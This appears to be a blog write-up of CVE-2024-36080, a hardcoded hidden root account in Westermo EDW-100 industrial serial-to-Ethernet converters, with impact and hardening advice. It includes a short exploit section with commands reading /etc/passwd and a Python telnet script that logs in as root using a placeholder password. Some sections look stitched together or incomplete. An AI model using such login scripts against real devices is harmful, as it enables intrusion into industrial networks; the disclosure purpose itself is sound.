CVE-2024-36080 - Hidden Root Account in Westermo EDW-100—Exposing Industrial Networks

A new and critical vulnerability, CVE-2024-36080, has been found in the Westermo EDW-100 family of serial-to-Ethernet converters. These devices are widely used in industrial environments to connect legacy serial devices to modern network infrastructure. Unfortunately, anyone with knowledge of the device’s inner workings can exploit a hidden root account with a hardcoded password—one that can’t be changed—making these devices a significant risk if not properly secured.

This long read breaks down the details, shows you how this flaw can be abused, and offers guidance on how to protect your industrial networks.

What is Westermo EDW-100?

The Westermo EDW-100 is an industrial serial-to-Ethernet converter, meaning it takes old-fashioned RS-232/422/485 serial data and translates it so it can travel over modern Ethernet networks. These are often used in factory automation, water treatment plants, railways, and anywhere legacy equipment needs to connect to IT infrastructure.

Product link:
https://www.westermo.com/products/serial-connectivity/ethernet-converters-and-extenders/edw-100

Type: Hidden root account with hardcoded, unchangeable password

- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2024-36080

The password cannot be changed or disabled by the user.

- Root access means full control: change configs, intercept data, install malware, or brick the device.

Physical or network access to the device (e.g., Telnet, SSH, or serial)

- Knowledge of the hidden root account password (could be discovered by reverse engineering firmware or leaks online)

> ⚠️ Warning: As of this writing, the hardcoded password is not published in official advisories, but threat actors with firmware extraction skills can reveal it. Protect your devices now.

Step-by-Step Exploit Example

Suppose you have network or console access to the EDW-100. The user manual only documents the "admin" account, but:

View running processes

ps

Dump file system

cat /etc/passwd

If you know (or guess) the hardcoded password, it’s easy to script access

import telnetlib

HOST = "192.168.1.100"
USER = "root"
PASSWORD = "<hardcoded_password>"

tn = telnetlib.Telnet(HOST)
tn.read_until(b"login: ")
tn.write(USER.encode('ascii') + b"\n")
tn.read_until(b"Password: ")
tn.write(PASSWORD.encode('ascii') + b"\n")
tn.write(b"id\n")
print(tn.read_until(b"# ").decode('ascii'))
tn.close()

2. Network Risk

If the EDW-100 is on a flat network, attackers can jump from here to other more sensitive systems (industrial lateral movement).

3. Supply Chain Threat

If these devices are cloned or reused from insecure workshops, the root backdoor remains present.

- Westermo has published an advisory

- Westermo Security Advisory

Links & References

- National Vulnerability Database: CVE-2024-36080
- ICS-CERT Advisory (Coming Soon)
- Westermo EDW-100 Product Page

Conclusion

Devices like the Westermo EDW-100 are often forgotten "glue" in industrial networks. The discovery of a hardcoded, hidden root user is a reminder: even the smallest device can open the gate for attackers. Until a patch is available, treat all EDW-100s as permanently untrusted, and plan to replace or harden them with strong segmentation.

Stay vigilant—and check those network closets!

> This writeup is based on publicly available CVE advisories, manual analysis, and industrial security best practices. For more technical details, consult the references above and reach out to your industrial control system (ICS) security specialist.

Timeline

Published on: 05/19/2024 20:15:08 UTC
Last modified on: 08/20/2024 16:35:16 UTC